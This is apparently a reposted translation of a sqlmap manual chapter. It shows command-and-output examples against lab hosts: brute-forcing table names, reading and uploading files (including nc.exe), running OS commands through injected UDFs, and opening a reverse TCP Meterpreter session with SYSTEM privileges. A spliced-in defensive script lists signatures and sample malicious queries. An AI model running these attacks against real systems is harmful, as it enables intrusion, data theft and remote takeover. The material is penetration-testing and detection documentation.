sqlmap User Manual (7): Brute Forcing and More

Source: Internet  Published by: 数据火影  Editor: 程序博客网  Time: 2024/05/14 15:52

Brute forcing


Brute-forcing table names

Option: --common-tables

Use this option when --tables cannot retrieve the database's tables.

This usually happens in the following situations:

1. The MySQL version is lower than 5.0, so there is no information_schema database.
2. The database is Microsoft Access and its system table MSysObjects is not readable (the default).
3. The current user does not have privileges to read the system tables that hold the schema.

The table names to try are in txt/common-tables.txt; you can add your own.

An example against MySQL 4.1:

$ python sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --common-tables -D testdb --banner
[...]
[hh:mm:39] [INFO] testing MySQL
[hh:mm:39] [INFO] confirming MySQL
[hh:mm:40] [INFO] the back-end DBMS is MySQL
[hh:mm:40] [INFO] fetching banner
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS operating system: Windows
back-end DBMS: MySQL < 5.0.0
banner:    '4.1.21-community-nt'
[hh:mm:40] [INFO] checking table existence using items from '/software/sqlmap/txt/common-tables.txt'
[hh:mm:40] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 8
[hh:mm:43] [INFO] retrieved: users
Database: testdb
[1 table]
+-------+
| users |
+-------+

Brute-forcing column names

Option: --common-columns

This works the same way as brute-forcing table names; the column names to try are in txt/common-columns.txt.

User-defined function injection


Options: --udf-inject, --shared-lib

You can inject your own user-defined functions (UDFs) by compiling a shared library for MySQL or PostgreSQL: a DLL on Windows, or a shared object on Linux/Unix. sqlmap will ask you a few questions, upload the library to the database server, create the user-defined functions from it and, depending on your choices, execute them. When you are done with the injection, sqlmap will remove them again.

File system operations


Reading files from the database server

Option: --file-read

This works when the database is MySQL, PostgreSQL or Microsoft SQL Server and the current user has the privileges to use the relevant functions. The file read can be either text or binary.

An example against Microsoft SQL Server 2005:

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" \
--file-read "C:/example.exe" -v 1
[...]
[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
[hh:mm:50] [INFO] the SQL query provided returns 3 entries
C:/example.exe file saved to:    '/software/sqlmap/output/192.168.136.129/files/C__example.exe'
[...]

$ ls -l output/192.168.136.129/files/C__example.exe
-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe

$ file output/192.168.136.129/files/C__example.exe
output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Uploading files to the database server

Options: --file-write, --file-dest

This works when the database is MySQL, PostgreSQL or Microsoft SQL Server and the current user has the privileges to use the relevant functions. The file uploaded can be either text or binary.

An example against MySQL:

$ file /software/nc.exe.packed
/software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit

$ ls -l /software/nc.exe.packed
-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write \
"/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1
[...]
[hh:mm:29] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or 2008
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL >= 5.0.0
[...]
do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully written on the back-end DBMS file system? [Y/n] y
[hh:mm:52] [INFO] retrieved: 31744
[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes, same size as the local file '/software/nc.exe.packed'

Running arbitrary operating system commands

Options: --os-cmd, --os-shell

This works when the database is MySQL, PostgreSQL or Microsoft SQL Server and the current user has the privileges to use the relevant functions.

On MySQL and PostgreSQL, sqlmap uploads a binary library containing the user-defined functions sys_exec() and sys_eval().

The two functions it creates can then execute system commands. On Microsoft SQL Server, sqlmap uses the xp_cmdshell stored procedure; if it is disabled (the default on Microsoft SQL Server 2005 and later), sqlmap re-enables it, and if it does not exist, sqlmap creates it automatically.

An example against PostgreSQL:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" \
--os-cmd id -v 1
[...]
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:12] [INFO] the back-end DBMS operating system is Linux
[hh:mm:12] [INFO] testing if current user is DBA
[hh:mm:12] [INFO] detecting back-end DBMS version from its banner
[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist
[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file
[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:    'uid=104(postgres) gid=106(postgres) groups=106(postgres)'
[hh:mm:19] [INFO] cleaning up the database management system
do you want to remove UDF 'sys_eval'? [Y/n] y
do you want to remove UDF 'sys_exec'? [Y/n] y
[hh:mm:23] [INFO] database management system cleanup finished
[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can only be deleted manually

The --os-shell option simulates a real shell in which you can type the commands you want to run.

When stacked queries cannot be executed (for example when the back end is MySQL behind PHP or ASP), it may still be possible to create a web backdoor by writing into a writable directory with INTO OUTFILE. Supported languages:

1. ASP
2. ASP.NET
3. JSP
4. PHP
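The UDF injection, file read/write and OS command sections above all leave traces in the DBMS query log. The following detector is an added example (not code from the manual or from sqlmap) that scans query-log lines for the primitives these sections name: CREATE FUNCTION ... SONAME, LOAD_FILE, INTO OUTFILE/DUMPFILE, sys_exec/sys_eval/sys_bineval, xp_cmdshell and sp_replwritetovarbin. The log lines and the library name udf_placeholder.dll are constructed; the rule names and regexes are this example's own.

```python
import re

# Signatures for the DBMS-side primitives this manual section describes. The
# function and procedure names are those named on the page; the regexes and the
# rule names are this example's own. Case-insensitive because payloads and
# hand-typed queries vary in casing.
RULES = {
    "udf_creation":   re.compile(r"\bCREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\b.*\bSONAME\b", re.I),
    "udf_os_exec":    re.compile(r"\bsys_(?:exec|eval|bineval)\s*\(", re.I),
    "file_read":      re.compile(r"\bLOAD_FILE\s*\(", re.I),
    "file_write":     re.compile(r"\bINTO\s+(?:OUTFILE|DUMPFILE)\b", re.I),
    "mssql_cmdshell": re.compile(r"\bxp_cmdshell\b", re.I),
    "mssql_reenable": re.compile(r"\bsp_configure\b.*\bxp_cmdshell\b", re.I),
    "mssql_bof":      re.compile(r"\bsp_replwritetovarbin\b", re.I),
}

# Constructed MySQL general-log style lines (not taken from the page); the UDF
# library name 'udf_placeholder.dll' is a placeholder.
SAMPLE_LOG = """\
120514 15:52:01    12 Query     SELECT * FROM news WHERE id=1
120514 15:52:02    12 Query     SELECT * FROM news WHERE id=1 UNION ALL SELECT LOAD_FILE('C:/example.exe')
120514 15:52:03    12 Query     SELECT 0x4142 INTO DUMPFILE 'C:/WINDOWS/Temp/nc.exe'
120514 15:52:04    12 Query     CREATE FUNCTION sys_exec RETURNS int SONAME 'udf_placeholder.dll'
120514 15:52:05    12 Query     SELECT sys_eval('id')
120514 15:52:06    13 Query     SELECT name FROM users WHERE id=2
"""

def scan_log(text):
    """Return (line_number, rule_name, stripped_line) for each rule each line
    triggers. One line may trigger several rules, e.g. re-enabling xp_cmdshell
    through sp_configure matches both mssql_cmdshell and mssql_reenable."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        for name, rx in RULES.items():
            if rx.search(line):
                findings.append((n, name, line.strip()))
    return findings

def triggered_rules(text):
    """Distinct rule names seen in the log: the set to raise an alert on."""
    return {name for _, name, _ in scan_log(text)}

if __name__ == "__main__":
    for n, name, line in scan_log(SAMPLE_LOG):
        print(f"line {n}: {name}: {line}")
```

A single connection id producing udf_creation followed by udf_os_exec within seconds is the pattern the --os-cmd transcript above would leave behind; matching on the connection id rather than only on individual lines is the natural next refinement.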

Working with Meterpreter

Options: --os-pwn, --os-smbrelay, --os-bof, --priv-esc, --msf-path, --tmp-path

When the database is MySQL, PostgreSQL or Microsoft SQL Server and the current user has the privileges to use the relevant functions, a TCP connection can be established directly between the database server and the attacker's machine; this connection can be an interactive command prompt or a Meterpreter session. sqlmap generates the shellcode with Metasploit and has four ways of executing it:

1. Via the user-defined sys_bineval() function, which executes the Metasploit shellcode in memory; supported on MySQL and PostgreSQL; option --os-pwn.
2. By uploading a stand-alone payload and executing it through a user-defined function: sys_exec() on MySQL and PostgreSQL, xp_cmdshell() on Microsoft SQL Server; option --os-pwn.
3. By executing the Metasploit shellcode through an SMB attack (MS08-068), when the privileges sqlmap has obtained are high enough (uid=0 on Linux/Unix, Administrator on Windows); option --os-smbrelay.
4. By overflowing the sp_replwritetovarbin stored procedure of Microsoft SQL Server 2000 and 2005 (MS09-004) and executing the Metasploit payload in memory; option --os-bof.

An example against MySQL:

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn --msf-path /software/metasploit
[...]
[hh:mm:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:31] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 
[hh:mm:32] [INFO] testing if current user is DBA
[hh:mm:32] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 
[hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist
[hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:33] [INFO] detecting back-end DBMS version from its banner
[hh:mm:33] [INFO] retrieving MySQL base directory absolute path
[hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
> 
[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode 
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
> 
which is the local address? [192.168.136.1] 
which local port number do you want to use? [60641] 
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 
[hh:mm:40] [INFO] creation in progress ... done
[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..

[... Metasploit ASCII-art banner ...]

       =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 674 exploits - 351 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
       =[ svn r12272 updated 4 days ago (2011.04.07)

PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 60641
LHOST => 192.168.136.1
[*] Started reverse handler on 192.168.136.1:60641 
[*] Starting the payload handler...
[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval', please wait..
[*] Sending stage (749056 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) at Mon Apr 11 hh:mm:52 +0100 2011

meterpreter > Loading extension espia...success.
meterpreter > Loading extension incognito...success.
meterpreter > [-] The 'priv' extension has already been loaded.
meterpreter > Loading extension sniffer...success.
meterpreter > System Language : en_US
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Computer        : W2K3R2
Architecture    : x86
Meterpreter     : x86/win32
meterpreter > Server username: NT AUTHORITY\SYSTEM
meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

Intel(R) PRO/1000 MT Network Connection
Hardware MAC: 00:0c:29:fc:79:39
IP Address  : 192.168.136.129
Netmask     : 255.255.255.0

meterpreter > exit
[*] Meterpreter session 1 closed.  Reason: User exit

By default, MySQL on Windows runs as SYSTEM; PostgreSQL runs with low privileges on both Windows and Linux; Microsoft SQL Server 2000 runs as SYSTEM by default; Microsoft SQL Server 2005 and 2008 mostly run as NETWORK SERVICE and sometimes as LOCAL SERVICE.
